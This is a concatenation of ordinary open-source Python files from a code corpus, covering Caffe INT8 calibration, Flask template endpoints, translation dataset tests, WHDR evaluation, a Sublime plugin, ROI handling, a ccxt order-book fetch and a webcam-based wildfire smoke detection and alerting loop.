Normalize the input list Args: distribution: a list ,size is 2048 Returns: none """ num_sum = sum(distribution) for i, data in enumerate(distribution): distribution[i] = data / float(num_sum) def compute_kl_divergence(dist_a, dist_b): """ Returen kl_divergence between Args: dist_a: list original dist_b: list expand Returns: kl_divergence: float, kl_divergence """ nonzero_inds = dist_a != 0 return np.sum(dist_a[nonzero_inds] * np.log(dist_a[nonzero_inds] / dist_b[nonzero_inds])) def threshold_distribution(distribution, target_bin=128): """ Returen the best cut off num of bin Args: distribution: list, activations has been processed by histogram and normalize,size is 2048 target_bin: int, the num of bin that is used by quantize, Int8 default value is 128 Returns: target_threshold: int, num of bin with the minimum KL """ target_threshold = target_bin min_kl_divergence = 1000 length = distribution.size quantize_distribution = np.zeros(target_bin) threshold_sum = 0.0 threshold_sum = sum(distribution[target_bin:]) for threshold in range(target_bin, length): t_distribution = copy.deepcopy(distribution[:threshold]) t_distribution[threshold-1] = t_distribution[threshold-1] + threshold_sum threshold_sum = threshold_sum - distribution[threshold] # ************************ threshold ************************ quantize_distribution = np.zeros(target_bin) num_per_bin = threshold / target_bin for i in range(0, target_bin): start = i * num_per_bin end = start + num_per_bin left_upper = (int)(math.ceil(start)) if(left_upper > start): left_scale = left_upper - start quantize_distribution[i] += left_scale * distribution[left_upper - 1] right_lower = (int)(math.floor(end)) if (right_lower < end): right_scale = end - right_lower quantize_distribution[i] += right_scale * distribution[right_lower] for j in range(left_upper, right_lower): quantize_distribution[i] += distribution[j] # ************************ threshold ************************ # ************************ quantize ************************ expand_distribution = np.zeros(threshold, dtype=np.float32) for i in range(0, target_bin): start = i * num_per_bin end = start + num_per_bin count = 0 left_upper = (int)(math.ceil(start)) left_scale = 0.0 if (left_upper > start): left_scale = left_upper - start if (distribution[left_upper - 1] != 0): count += left_scale right_lower = (int)(math.floor(end)) right_scale = 0.0 if (right_lower < end): right_scale = end - right_lower if (distribution[right_lower] != 0): count += right_scale for j in range(left_upper, right_lower): if (distribution[j] != 0): count = count + 1 if count == 0: continue; expand_value = quantize_distribution[i] / count if (left_upper > start): if (distribution[left_upper - 1] != 0): expand_distribution[left_upper - 1] += expand_value * left_scale if (right_lower < end): if (distribution[right_lower] != 0): expand_distribution[right_lower] += expand_value * right_scale for j in range(left_upper, right_lower): if (distribution[j] != 0): expand_distribution[j] += expand_value # ************************ quantize ************************ kl_divergence = compute_kl_divergence(t_distribution, expand_distribution) if kl_divergence < min_kl_divergence: min_kl_divergence = kl_divergence target_threshold = threshold return target_threshold def net_forward(net, image_path, transformer): """ network inference and statistics the cost time Args: net: the instance of Caffe inference image_path: a image need to be inference transformer: Returns: none """ # load image image = caffe.io.load_image(image_path) # transformer.preprocess the image net.blobs['data'].data[...] = transformer.preprocess('data',image) # net forward start = time.clock() output = net.forward() end = time.clock() print("%s forward time : %.3f s" % (image_path, end - start)) def file_name(file_dir): """ Find the all file path with the directory Args: file_dir: The source file directory Returns: files_path: all the file path into a list """ files_path = [] for root, dir, files in os.walk(file_dir): for name in files: file_path = root + "/" + name print(file_path) files_path.append(file_path) return files_path def network_prepare(net, mean, norm): """ instance the prepare process param of caffe network inference Args: net: the instance of Caffe inference mean: the value of mean norm: the value of normalize Returns: none """ print("Network initial") img_mean = np.array(mean) # initial transformer transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape}) # convert shape from RBG to BGR transformer.set_transpose('data', (2,0,1)) # load meanfile transformer.set_mean('data', img_mean) # resize image data from [0,1] to [0,255] transformer.set_raw_scale('data', 255) # convert RGB -> BGR transformer.set_channel_swap('data', (2,1,0)) # normalize transformer.set_input_scale('data', norm) return transformer def weight_quantize(net, net_file, group_on): """ CaffeModel convolution weight blob Int8 quantize Args: net: the instance of Caffe inference net_file: deploy caffe prototxt Returns: none """ print("\nQuantize the kernel weight:") # parse the net param from deploy prototxt params = caffe_pb2.NetParameter() with open(net_file) as f: text_format.Merge(f.read(), params) for i, layer in enumerate(params.layer): if i == 0: if layer.type != "Input": raise ValueError("First layer should be input") # find the convolution 3x3 and 1x1 layers to get out the weight_scale if(layer.type == "Convolution" or layer.type == "ConvolutionDepthwise"): kernel_size = layer.convolution_param.kernel_size[0] if(kernel_size == 3 or kernel_size == 1): weight_blob = net.params[layer.name][0].data # initial the instance of QuantizeLayer Class lists,you can use enable group quantize to generate int8 scale for each group layer.convolution_param.group if (group_on == 1): quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], layer.convolution_param.group) else: quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], 1) # quantize the weight value quanitze_layer.quantize_weight(weight_blob) # add the quantize_layer into the save list quantize_layer_lists.append(quanitze_layer) return None def activation_sparse(net, transformer, images_files): """ Activation bottom blob sparse analyze Args: net: the instance of Caffe inference transformer: images_files: calibration dataset Returns: none """ print("\nAnalyze the sparse info of the Activation:") # run float32 inference on calibration dataset to find the activations range for i , image in enumerate(images_files): net_forward(net, image, transformer) print("loop stage 1 : %d" % (i)) # find max threshold for layer in quantize_layer_lists: blob = net.blobs[layer.blob_name].data[0].flatten() layer.initial_blob_max(blob) # calculate statistic blob scope and interval distribution for layer in quantize_layer_lists: layer.initial_blob_distubution_interval() return None def activation_quantize(net, transformer, images_files): """ Activation Int8 quantize, optimaize threshold selection with KL divergence, given a dataset, find the optimal threshold for quantizing it. Ref: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf Args: net: the instance of Caffe inference transformer: images_files: calibration dataset Returns: none """ print("\nQuantize the Activation:") # run float32 inference on calibration dataset to find the activations range for i , image in enumerate(images_files): net_forward(net, image, transformer) print("loop stage 1 : %d" % (i)) # find max threshold for layer in quantize_layer_lists: blob = net.blobs[layer.blob_name].data[0].flatten() layer.initial_blob_max(blob) # calculate statistic blob scope and interval distribution for layer in quantize_layer_lists: layer.initial_blob_distubution_interval() # for each layers # collect histograms of activations print("\nCollect histograms of activations:") for i, image in enumerate(images_files): net_forward(net, image, transformer) print("loop stage 2 : %d" % (i)) start = time.clock() for layer in quantize_layer_lists: blob = net.blobs[layer.blob_name].data[0].flatten() layer.initial_histograms(blob) end = time.clock() print("add cost %.3f s" % (end - start)) # calculate threshold with KL divergence for layer in quantize_layer_lists: layer.quantize_blob() return None def save_calibration_file(calibration_path): calibration_file = open(calibration_path, 'w') # save temp save_temp = [] # save weight scale for layer in quantize_layer_lists: save_string = layer.name + "_param_0" for i in range(layer.group_num): save_string = save_string + " " + str(layer.weight_scale[i]) save_temp.append(save_string) # save bottom blob scales for layer in quantize_layer_lists: save_string = layer.name for i in range(layer.group_num): save_string = save_string + " " + str(layer.blob_scale[i]) save_temp.append(save_string) # save into txt file for data in save_temp: calibration_file.write(data + "\n") calibration_file.close() def usage_info(): """ usage info """ print("Input params is illegal...╮(╯3╰)╭") print("try it again:\n python caffe-int8-scale-tools.py -h") def main(): """ main function """ # time start time_start = datetime.datetime.now() print(args) if args.proto == None or args.model == None or args.mean == None or args.images == None: usage_info() return None # deploy caffe prototxt path net_file = args.proto # trained caffemodel path caffe_model = args.model # mean value mean = args.mean # norm value norm = 1.0 if args.norm != 1.0: norm = args.norm[0] # calibration dataset images_path = args.images # the output calibration file calibration_path = args.output # enable the group scale group_on = args.group # default use CPU to forwark if args.gpu != 0: caffe.set_device(0) caffe.set_mode_gpu() # initial caffe net and the forword model(GPU or CPU) net = caffe.Net(net_file,caffe_model,caffe.TEST) # prepare the cnn network transformer = network_prepare(net, mean, norm) # get the calibration datasets images files path images_files = file_name(images_path) # quanitze kernel weight of the caffemodel to find it's calibration table # weight_quantize(net, net_file) weight_quantize(net, net_file, group_on) # quantize activation value of the caffemodel to find it's calibration table activation_quantize(net, transformer, images_files) # save the calibration tables,best wish for your INT8 inference have low accuracy loss :) save_calibration_file(calibration_path) # time end time_end = datetime.datetime.now() print("\nCaffe Int8 Calibration table create success, it's cost %s, best wish for your INT8 inference has a low accuracy loss...\(^▽^)/...2333..." % (time_end - time_start)) if __name__ == "__main__": main()
1.773438
2
example_project/views.py
AKuederle/flask-template-master
2
11035
""" All your views aka. your template endpoints go here. There are two ways to create a view. 1. Create a new Subclass inheriting from one of the flask_template_master views 2. Use the view-factory function flask_template_master.views.create_template_endpoint Each view requires an 1 (and 2 optional) things: 1. An environment: The environment provides the templates and handles all options of how templates are rendered 2. (optional) An global provider: A global provider provides variables that are accessible in all templates of the endpoint 3. (optional) An compiler: The compiler gets the rendered template and can handle a postprocessing step and controls the data that is returned. This can e.g. be used to run a Latex compilation. """ import jinja2 from flask_template_master.compiler import LatexCompiler from flask_template_master.views import BaseTemplateView, create_template_endpoint from flask_template_master import Api from flask_template_master.global_provider import DictGlobalProvider from flask_template_master.environments import LATEX_TEMPLATE_CONFIG api = Api() # create an instance of an flask-restfull API. Always required! class TestView(BaseTemplateView): """This is an example of a view created as a subclass. This is a simple view using a Dict loader to provide all template strings inline. It does not use a compile step and simply returns the rendered template string on POST. It passes one value as a global variable. This can be seen in template b. The global variable will be overwritten, if a variable with the same name is passed by the POST request """ # The environment needs to be a jinja environment with a loader ENVIRONMENT = jinja2.Environment(loader=jinja2.DictLoader({'a': '{{ test }}', 'b': '{{ test }} {{ global }}'})) GLOBAL_PROVIDER = DictGlobalProvider({'global': 'This is a global value'}) # This registers '/class_test/' for the overview and '/class_test/<template_name> for the individual templates TestView.add_as_resource(api, '/class_test/') # This is an example on how to use the factory function # Setting up the jinja2 enviroemnt using a file loader with LaTex config environment = jinja2.Environment(loader=jinja2.FileSystemLoader('./templates'), **LATEX_TEMPLATE_CONFIG) compiler = LatexCompiler() create_template_endpoint(api, '/factory_test/', environment=environment, compiler=compiler)
3.078125
3
CustomExceptions.py
DouglasHSS/NeuralNetworks
0
11036
class PerceptronError(Exception): pass
1.195313
1
pytorch_translate/test/test_data.py
dpacgopinath/translate-1
0
11037
<filename>pytorch_translate/test/test_data.py<gh_stars>0 #!/usr/bin/env python3 import unittest import os from pytorch_translate import data from pytorch_translate import dictionary from pytorch_translate.test import utils as test_utils class TestInMemoryNumpyDataset(unittest.TestCase): def setUp(self): self.src_txt, self.trg_txt = test_utils.create_test_text_files() self.vocab_file_path = test_utils.make_temp_file() self.d = dictionary.Dictionary.build_vocab_file( corpus_files=[self.src_txt, self.trg_txt], vocab_file=self.vocab_file_path, max_vocab_size=0, ) # src_ref is reversed, +1 for lua self.src_ref = [ [107, 105, 103, 101], [105, 105, 103, 103, 101, 101], [103, 103, 103, 103, 101, 101, 101, 101], [101, 101, 101, 101, 101, 101, 101, 101, 101, 101], ] self.trg_ref = [ [102, 102, 102, 102, 102, 102, 102, 102, 102, 102], [102, 102, 102, 102, 104, 104, 104, 104], [102, 102, 104, 104, 106, 106], [102, 104, 106, 108], ] self.src_txt_numberized, self.trg_txt_numberized = test_utils.create_test_numberized_data_files( self.src_ref, self.trg_ref, reverse_source=True ) self.lua_eos = self.d.eos_index + 1 self.num_sentences = 4 def tearDown(self): os.remove(self.src_txt) os.remove(self.trg_txt) os.remove(self.vocab_file_path) def test_parse(self): src_dataset = data.InMemoryNumpyDataset() trg_dataset = data.InMemoryNumpyDataset() for _ in range(2): src_dataset.parse( self.src_txt, self.d, reverse_order=True, append_eos=False ) trg_dataset.parse( self.trg_txt, self.d, reverse_order=False, append_eos=True ) self.assertEqual(self.num_sentences, len(src_dataset)) self.assertEqual(self.num_sentences, len(trg_dataset)) for i in range(self.num_sentences): self.assertListEqual(self.src_ref[i], src_dataset[i].tolist()) self.assertListEqual( self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist() ) def test_parse_numberize(self): src_dataset = data.InMemoryNumpyDataset() trg_dataset = data.InMemoryNumpyDataset() for _ in range(2): src_dataset.parse( self.src_txt_numberized, self.d, reverse_order=True, append_eos=False, already_numberized=True, ) trg_dataset.parse( self.trg_txt_numberized, self.d, reverse_order=False, append_eos=True, already_numberized=True, ) self.assertEqual(self.num_sentences, len(src_dataset)) self.assertEqual(self.num_sentences, len(trg_dataset)) for i in range(self.num_sentences): self.assertListEqual(self.src_ref[i], src_dataset[i].tolist()) self.assertListEqual( self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist() ) def test_parse_oversampling(self): dataset = data.InMemoryNumpyDataset() factors = [(1, 0), (3, 2), (4, 4)] for o1, o2 in factors: corpora = [ data.MultilingualCorpusConfig( dialect_id=None, data_file=self.trg_txt, dict=self.d, oversampling=o1, ), data.MultilingualCorpusConfig( dialect_id=None, data_file=self.trg_txt, dict=self.d, oversampling=o2, ), ] dataset.parse_multilingual(corpora) self.assertEqual((o1 + o2) * self.num_sentences, len(dataset)) def test_parse_multiling(self): prepend_dataset = data.InMemoryNumpyDataset() append_dataset = data.InMemoryNumpyDataset() corpora = [ data.MultilingualCorpusConfig( dialect_id=10, data_file=self.trg_txt, dict=self.d, oversampling=1 ), data.MultilingualCorpusConfig( dialect_id=11, data_file=self.trg_txt, dict=self.d, oversampling=1 ), ] lang1 = corpora[0].dialect_id + 1 # +1 for lua lang2 = corpora[1].dialect_id + 1 # +1 for lua prepend_dataset.parse_multilingual( corpora, reverse_order=False, append_eos=False, prepend_language_id=True ) append_dataset.parse_multilingual( corpora, reverse_order=False, append_eos=False, prepend_language_id=False ) self.assertEqual(2 * self.num_sentences, len(prepend_dataset)) self.assertEqual(2 * self.num_sentences, len(append_dataset)) for i in range(self.num_sentences): self.assertListEqual([lang1] + self.trg_ref[i], prepend_dataset[i].tolist()) self.assertListEqual(self.trg_ref[i] + [lang1], append_dataset[i].tolist()) self.assertListEqual( [lang2] + self.trg_ref[i], prepend_dataset[i + self.num_sentences].tolist(), ) self.assertListEqual( self.trg_ref[i] + [lang2], append_dataset[i + self.num_sentences].tolist(), )
2.453125
2
CompareWHDR.py
Z7Gao/InverseRenderingOfIndoorScene
171
11038
<filename>CompareWHDR.py import numpy as np import sys import json import glob import os.path as osp import cv2 def compute_whdr(reflectance, judgements, delta=0.1): points = judgements['intrinsic_points'] comparisons = judgements['intrinsic_comparisons'] id_to_points = {p['id']: p for p in points} rows, cols = reflectance.shape[0:2] error_sum = 0.0 error_equal_sum = 0.0 error_inequal_sum = 0.0 weight_sum = 0.0 weight_equal_sum = 0.0 weight_inequal_sum = 0.0 for c in comparisons: # "darker" is "J_i" in our paper darker = c['darker'] if darker not in ('1', '2', 'E'): continue # "darker_score" is "w_i" in our paper weight = c['darker_score'] if weight <= 0.0 or weight is None: continue point1 = id_to_points[c['point1']] point2 = id_to_points[c['point2']] if not point1['opaque'] or not point2['opaque']: continue # convert to grayscale and threshold l1 = max(1e-10, np.mean(reflectance[int(point1['y'] * rows), int(point1['x'] * cols), ...])) l2 = max(1e-10, np.mean(reflectance[int(point2['y'] * rows), int(point2['x'] * cols), ...])) # convert algorithm value to the same units as human judgements if l2 / l1 > 1.0 + delta: alg_darker = '1' elif l1 / l2 > 1.0 + delta: alg_darker = '2' else: alg_darker = 'E' if darker == 'E': if darker != alg_darker: error_equal_sum += weight weight_equal_sum += weight else: if darker != alg_darker: error_inequal_sum += weight weight_inequal_sum += weight if darker != alg_darker: error_sum += weight weight_sum += weight if weight_sum: return (error_sum / weight_sum), error_equal_sum/( weight_equal_sum + 1e-10), error_inequal_sum/(weight_inequal_sum + 1e-10) else: return None #root = './testReal_cascade0_black_height120_width160/cascade0/iiw/' root = 'IIW_cascade1/results_brdf2_brdf1/' rootGt = '/home/zhl/CVPR20/Resubmission/Dataset/IIW/iiw-dataset/data/' suffix = 'albedoBS1.png' count = 0.0 whdr_sum = 0.0 whdr_mean = 0.0 img_list = glob.glob(osp.join(root, '*_%s' % suffix ) ) for img_path in img_list: #load CGI precomputed file judgement_path = osp.join(rootGt, img_path.split('/')[-1].split('_')[0] + '.json' ) judgements = json.load(open(judgement_path) ) count+=1.0 ourR = cv2.imread(img_path ).astype(np.float32 ) / 255.0 whdr, _, _ = compute_whdr(ourR, judgements ) whdr_sum += whdr print('img_path: {0}, whdr: current {1} average {2}'. format(img_path.split('/')[-1].split('_')[0], whdr, whdr_sum / count ) ) whdr_mean = whdr_sum / count print('whdr ours: {0}'.format(whdr_mean ) )
2.78125
3
theonionbox/stamp.py
ralphwetzel/theonionbox
120
11039
__title__ = 'The Onion Box' __description__ = 'Dashboard to monitor Tor node operations.' __version__ = '20.2' __stamp__ = '20200119|095654'
0.824219
1
UnicodeTraps.py
loamhoof/sublime-plugins-dump
0
11040
import re from sublime import Region import sublime_plugin REPLACEMENTS = { '\u00a0': ' ', # no-break space '\u200b': '', # zero-width space } class UnicodeTrapsListener(sublime_plugin.EventListener): @staticmethod def on_pre_save(view): view.run_command('unicode_traps') class UnicodeTraps(sublime_plugin.TextCommand): def run(self, edit): all_file = self.view.substr(Region(0, self.view.size())) matches = list(re.finditer('[%s]' % ''.join(REPLACEMENTS), all_file)) for match in reversed(matches): self.view.replace(edit, Region(*match.span()), REPLACEMENTS[match.group()])
2.59375
3
simba/ROI_multiply.py
KonradDanielewski/simba
172
11041
<filename>simba/ROI_multiply.py import glob import pandas as pd from configparser import ConfigParser import os from simba.drop_bp_cords import * def multiplyFreeHand(inifile, currVid): _, CurrVidName, ext = get_fn_ext(currVid) config = ConfigParser() configFile = str(inifile) config.read(configFile) projectPath = config.get('General settings', 'project_path') videoPath = os.path.join(projectPath, 'videos') ROIcoordinatesPath = os.path.join(projectPath, 'logs', 'measures', 'ROI_definitions.h5') try: rectanglesInfo = pd.read_hdf(ROIcoordinatesPath, key='rectangles') circleInfo = pd.read_hdf(ROIcoordinatesPath, key='circleDf') polygonInfo = pd.read_hdf(ROIcoordinatesPath, key='polygons') rectangularDf = rectanglesInfo.loc[rectanglesInfo['Video'] == str(CurrVidName)] circleDf = circleInfo.loc[circleInfo['Video'] == str(CurrVidName)] polygonDf = polygonInfo.loc[polygonInfo['Video'] == str(CurrVidName)] ROIdefExist = True except FileNotFoundError: ROIdefExist = False print('Cannot apply to all: no ROI definitions exists') if ROIdefExist is True: if (len(rectangularDf) == 0 and len(circleDf) == 0 and len(polygonDf) == 0): print('Cannot apply ROIs to all: no records exist for ' + str(CurrVidName)) else: videofilesFound = glob.glob(videoPath + '/*.mp4') + glob.glob(videoPath + '/*.avi') duplicatedRec, duplicatedCirc, duplicatedPoly = (rectangularDf.copy(), circleDf.copy(), polygonDf.copy()) for vids in videofilesFound: _, CurrVidName, ext = get_fn_ext(vids) duplicatedRec['Video'], duplicatedCirc['Video'], duplicatedPoly['Video'] = (CurrVidName, CurrVidName, CurrVidName) rectangularDf = rectangularDf.append(duplicatedRec, ignore_index=True) circleDf = circleDf.append(duplicatedCirc, ignore_index=True) polygonDf = polygonDf.append(duplicatedPoly, ignore_index=True) rectangularDf = rectangularDf.drop_duplicates(subset=['Video', 'Name'], keep="first") circleDf = circleDf.drop_duplicates(subset=['Video', 'Name'], keep="first") polygonDf = polygonDf.drop_duplicates(subset=['Video', 'Name'], keep="first") store = pd.HDFStore(ROIcoordinatesPath, mode='w') store['rectangles'] = rectangularDf store['circleDf'] = circleDf store['polygons'] = polygonDf store.close() print('ROI(s) for ' + CurrVidName + ' applied to all videos') print('Next, click on "draw" to modify ROI location(s) or click on "reset" to remove ROI drawing(s)')
2.484375
2
src/utils/ccxt/fetch_order_book.py
YasunoriMATSUOKA/crypto-asset-easy-management
0
11042
<filename>src/utils/ccxt/fetch_order_book.py from logging import getLogger import traceback from .get_public_exchange import get_public_exchange logger = getLogger("__main__").getChild(__name__) def fetch_order_book(exchange_name, pair): logger.debug("start") logger.debug(exchange_name) logger.debug(pair) exchange = get_public_exchange(exchange_name) try: logger.debug("try") order_book = exchange.fetch_order_book(pair) logger.info("success") except Exception as error: logger.warning("failure") logger.warning(error) logger.debug(traceback.format_exc()) order_book = None logger.debug(order_book) logger.debug("end") return order_book
2.53125
3
smoke-classifier/detect_fire.py
agnes-yang/firecam
10
11043
<reponame>agnes-yang/firecam<gh_stars>1-10 # Copyright 2018 The Fuego Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """ @author: <NAME> This is the main code for reading images from webcams and detecting fires """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys fuegoRoot = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(fuegoRoot, 'lib')) sys.path.insert(0, fuegoRoot) import settings settings.fuegoRoot = fuegoRoot import collect_args import rect_to_squares import goog_helper os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # quiet down tensorflow logging (must be done before tf_helper) import tf_helper import db_manager import email_helper import sms_helper import img_archive from detection_policies import policies import logging import pathlib import tempfile import shutil import time, datetime, dateutil.parser import random import re import hashlib from urllib.request import urlretrieve import tensorflow as tf from PIL import Image, ImageFile, ImageDraw, ImageFont ImageFile.LOAD_TRUNCATED_IMAGES = True def getNextImage(dbManager, cameras, cameraID=None): """Gets the next image to check for smoke Uses a shared counter being updated by all cooperating detection processes to index into the list of cameras to download the image to a local temporary directory Args: dbManager (DbManager): cameras (list): list of cameras cameraID (str): optional specific camera to get image from Returns: Tuple containing camera name, current timestamp, and filepath of the image """ if getNextImage.tmpDir == None: getNextImage.tmpDir = tempfile.TemporaryDirectory() logging.warning('TempDir %s', getNextImage.tmpDir.name) if cameraID: camera = list(filter(lambda x: x['name'] == cameraID, cameras))[0] else: index = dbManager.getNextSourcesCounter() % len(cameras) camera = cameras[index] timestamp = int(time.time()) imgPath = img_archive.getImgPath(getNextImage.tmpDir.name, camera['name'], timestamp) # logging.warning('urlr %s %s', camera['url'], imgPath) try: urlretrieve(camera['url'], imgPath) except Exception as e: logging.error('Error fetching image from %s %s', camera['name'], str(e)) return getNextImage(dbManager, cameras) md5 = hashlib.md5(open(imgPath, 'rb').read()).hexdigest() if ('md5' in camera) and (camera['md5'] == md5) and not cameraID: logging.warning('Camera %s image unchanged', camera['name']) # skip to next camera return getNextImage(dbManager, cameras) camera['md5'] = md5 return (camera['name'], timestamp, imgPath, md5) getNextImage.tmpDir = None # XXXXX Use a fixed stable directory for testing # from collections import namedtuple # Tdir = namedtuple('Tdir', ['name']) # getNextImage.tmpDir = Tdir('c:/tmp/dftest') def getNextImageFromDir(imgDirectory): """Gets the next image to check for smoke from given directory A variant of getNextImage() above but works with files already present on the locla filesystem. Args: imgDirectory (str): directory containing the files Returns: Tuple containing camera name, current timestamp, and filepath of the image """ if getNextImageFromDir.tmpDir == None: getNextImageFromDir.tmpDir = tempfile.TemporaryDirectory() logging.warning('TempDir %s', getNextImageFromDir.tmpDir.name) if not getNextImageFromDir.files: allFiles = os.listdir(imgDirectory) # filter out files with _Score suffix because they contain annotated scores # generated by drawFireBox() function below. getNextImageFromDir.files = list(filter(lambda x: '_Score.jpg' not in x, allFiles)) getNextImageFromDir.index += 1 if getNextImageFromDir.index < len(getNextImageFromDir.files): fileName = getNextImageFromDir.files[getNextImageFromDir.index] origPath = os.path.join(imgDirectory, fileName) destPath = os.path.join(getNextImageFromDir.tmpDir.name, fileName) shutil.copyfile(origPath, destPath) parsed = img_archive.parseFilename(fileName) if not parsed: # failed to parse, so skip to next image return getNextImageFromDir(imgDirectory) md5 = hashlib.md5(open(destPath, 'rb').read()).hexdigest() return (parsed['cameraID'], parsed['unixTime'], destPath, md5) logging.warning('Finished processing all images in directory. Exiting') exit(0) getNextImageFromDir.files = None getNextImageFromDir.index = -1 getNextImageFromDir.tmpDir = None def checkAndUpdateAlerts(dbManager, camera, timestamp, driveFileIDs): """Check if alert has been recently sent out for given camera Args: dbManager (DbManager): camera (str): camera name timestamp (int): driveFileIDs (list): List of Google drive IDs for the uploaded image files Returns: True if this is a new alert, False otherwise """ # Only alert if there has not been a detection in the last hour. This prevents spam # from long lasting fires. sqlTemplate = """SELECT * FROM detections where CameraName='%s' and timestamp > %s and timestamp < %s""" sqlStr = sqlTemplate % (camera, timestamp - 60*60, timestamp) dbResult = dbManager.query(sqlStr) if len(dbResult) > 0: logging.warning('Supressing new alert due to recent detection') return False dbRow = { 'CameraName': camera, 'Timestamp': timestamp, 'ImageID': driveFileIDs[0] if driveFileIDs else '' } dbManager.add_data('alerts', dbRow) return True def alertFire(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp): """Send alerts about given fire through all channels (currently email and sms) Args: constants (dict): "global" contants cameraID (str): camera name imgPath: filepath of the original image annotatedFile: filepath of the annotated image driveFileIDs (list): List of Google drive IDs for the uploaded image files fireSegment (dictionary): dictionary with information for the segment with fire/smoke timestamp (int): time.time() value when image was taken """ emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp) smsFireNotification(constants['dbManager'], cameraID) def emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp): """Send an email alert for a potential new fire Send email with information about the camera and fire score includeing image attachments Args: constants (dict): "global" contants cameraID (str): camera name imgPath: filepath of the original image annotatedFile: filepath of the annotated image driveFileIDs (list): List of Google drive IDs for the uploaded image files fireSegment (dictionary): dictionary with information for the segment with fire/smoke timestamp (int): time.time() value when image was taken """ dbManager = constants['dbManager'] subject = 'Possible (%d%%) fire in camera %s' % (int(fireSegment['score']*100), cameraID) body = 'Please check the attached images for fire.' # commenting out links to google drive because they appear as extra attachments causing confusion # and some email recipients don't even have permissions to access drive. # for driveFileID in driveFileIDs: # driveTempl = '\nAlso available from google drive as https://drive.google.com/file/d/%s' # driveBody = driveTempl % driveFileID # body += driveBody # emails are sent from settings.fuegoEmail and bcc to everyone with active emails in notifications SQL table dbResult = dbManager.getNotifications(filterActiveEmail = True) emails = [x['email'] for x in dbResult] if len(emails) > 0: # attach images spanning a few minutes so reviewers can evaluate based on progression startTimeDT = datetime.datetime.fromtimestamp(timestamp - 3*60) endTimeDT = datetime.datetime.fromtimestamp(timestamp - 1*60) with tempfile.TemporaryDirectory() as tmpDirName: oldImages = img_archive.getHpwrenImages(constants['googleServices'], settings, tmpDirName, constants['camArchives'], cameraID, startTimeDT, endTimeDT, 1) attachments = oldImages or [] attachments.append(imgPath) if annotatedFile: attachments.append(annotatedFile) email_helper.sendEmail(constants['googleServices']['mail'], settings.fuegoEmail, emails, subject, body, attachments) def smsFireNotification(dbManager, cameraID): """Send an sms (phone text message) alert for a potential new fire Args: dbManager (DbManager): cameraID (str): camera name """ message = 'Fuego fire notification in camera %s. Please check email for details' % cameraID dbResult = dbManager.getNotifications(filterActivePhone = True) phones = [x['phone'] for x in dbResult] if len(phones) > 0: for phone in phones: sms_helper.sendSms(settings, phone, message) def deleteImageFiles(imgPath, origImgPath, annotatedFile): """Delete all image files given in segments Args: imgPath: filepath of the original image annotatedFile: filepath of the annotated image """ os.remove(imgPath) if imgPath != origImgPath: os.remove(origImgPath) if annotatedFile: os.remove(annotatedFile) ppath = pathlib.PurePath(imgPath) # leftoverFiles = os.listdir(str(ppath.parent)) # if len(leftoverFiles) > 0: # logging.warning('leftover files %s', str(leftoverFiles)) def getLastScoreCamera(dbManager): sqlStr = "SELECT CameraName from scores order by Timestamp desc limit 1;" dbResult = dbManager.query(sqlStr) if len(dbResult) > 0: return dbResult[0]['CameraName'] return None def heartBeat(filename): """Inform monitor process that this detection process is alive Informs by updating the timestamp on given file Args: filename (str): file path of file used for heartbeating """ pathlib.Path(filename).touch() def genDiffImage(imgPath, earlierImgPath, minusMinutes): """Subtract the two given images and store result in new difference image file Args: imgPath (str): filepath of the current image (to subtract from) imgPath (str): filepath of the earlier image (value to subtract) minusMinutes (int): number of minutes separating subtracted images Returns: file path to the difference image """ imgA = Image.open(imgPath) imgB = Image.open(earlierImgPath) imgDiff = img_archive.diffImages(imgA, imgB) parsedName = img_archive.parseFilename(imgPath) parsedName['diffMinutes'] = minusMinutes imgDiffName = img_archive.repackFileName(parsedName) ppath = pathlib.PurePath(imgPath) imgDiffPath = os.path.join(str(ppath.parent), imgDiffName) imgDiff.save(imgDiffPath, format='JPEG') return imgDiffPath def updateTimeTracker(timeTracker, processingTime): """Update the time tracker data with given time to process current image If enough samples new samples have been reorded, resets the history and updates the average timePerSample Args: timeTracker (dict): tracks recent image processing times processingTime (float): number of seconds needed to process current image """ timeTracker['totalTime'] += processingTime timeTracker['numSamples'] += 1 # after N samples, update the rate to adapt to current conditions # N = 50 should be big enough to be stable yet small enough to adapt if timeTracker['numSamples'] > 50: timeTracker['timePerSample'] = timeTracker['totalTime'] / timeTracker['numSamples'] timeTracker['totalTime'] = 0 timeTracker['numSamples'] = 0 logging.warning('New timePerSample %.2f', timeTracker['timePerSample']) def initializeTimeTracker(): """Initialize the time tracker Returns: timeTracker (dict): """ return { 'totalTime': 0.0, 'numSamples': 0, 'timePerSample': 3 # start off with estimate of 3 seconds per camera } def getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes): """Get random images from HPWREN archive matching given constraints and optionally subtract them Args: constants (dict): "global" contants cameras (list): list of cameras startTimeDT (datetime): starting time of time range timeRangeSeconds (int): number of seconds in time range minusMinutes (int): number of desired minutes between images to subract Returns: Tuple containing camera name, current timestamp, filepath of regular image, and filepath of difference image """ if getArchivedImages.tmpDir == None: getArchivedImages.tmpDir = tempfile.TemporaryDirectory() logging.warning('TempDir %s', getArchivedImages.tmpDir.name) cameraID = cameras[int(len(cameras)*random.random())]['name'] timeDT = startTimeDT + datetime.timedelta(seconds = random.random()*timeRangeSeconds) if minusMinutes: prevTimeDT = timeDT + datetime.timedelta(seconds = -60 * minusMinutes) else: prevTimeDT = timeDT files = img_archive.getHpwrenImages(constants['googleServices'], 